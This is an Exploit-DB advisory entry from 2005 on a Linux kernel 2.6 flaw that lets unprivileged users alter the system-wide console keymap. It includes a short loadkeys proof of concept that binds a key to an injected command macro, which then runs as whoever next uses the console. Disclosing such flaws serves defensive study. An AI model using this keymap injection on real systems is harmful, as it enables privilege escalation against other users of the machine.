Lucene search

K
exploitdbRudolf PolzerEDB-ID:26353
HistoryOct 17, 2005 - 12:00 a.m.

Linux Kernel 2.6 - Console Keymap Local Command Injection

2005-10-1700:00:00
Rudolf Polzer
www.exploit-db.com
24

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/15122/info

The Linux kernel is susceptible to a local command-injection vulnerability via console keymap modifications. This issue occurs because unprivileged users can alter the system-wide console keymap.

Local users may modify the console keymap to include scripted macro commands. This allows attackers to execute arbitrary commands with the privileges of the user that uses the console after them, potentially facilitating privilege escalation. 

loadkeys <<EOF
keycode 15 = F23
string F23 = "^V^C^V^Mecho hello world^V^M"
EOF